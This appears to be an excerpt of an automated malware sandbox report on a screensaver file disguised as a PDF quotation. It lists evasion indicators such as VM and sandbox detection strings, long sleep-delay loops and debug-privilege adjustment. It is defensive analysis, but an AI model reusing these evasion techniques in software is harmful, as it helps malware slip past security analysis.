                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1852, type: MEMORYSTR
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 5080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 1640000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598584Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598468Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598219Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597750Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597638Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597531Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597422Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597282Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597157Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596907Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596797Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596672Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596556Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596204Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596094Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595946Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595842Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595624Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595516Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595391Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595266Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595157Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595032Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrWindow / User API: threadDelayed 7773Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrWindow / User API: threadDelayed 2017Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 2472Thread sleep count: 7773 > 30Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 2472Thread sleep count: 2017 > 30Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99696s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -99016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -98906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -98797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -98687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -98575s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -98468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -98328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -98219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -598750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -598584s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -598468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -598344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -598219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597638s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597282s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -597047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596907s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596556s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -596094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595946s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595842s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595624s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595157s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504Thread sleep time: -595032s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99875Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99696Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99578Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99469Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99344Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99234Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99125Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 99016Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98906Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98797Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98687Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98575Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98468Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98328Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 98219Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598750Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598584Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598468Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598219Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597750Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597638Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597531Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597422Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597282Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597157Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596907Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596797Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596672Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596556Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596453Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596344Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596204Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 596094Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595946Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595842Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595624Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595516Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595391Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595266Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595157Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrThread delayed: delay time: 595032Jump to behavior
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2569130721.000000000122F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3285672822.00000000014FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scrProcess token adjusted: DebugJump to behavior
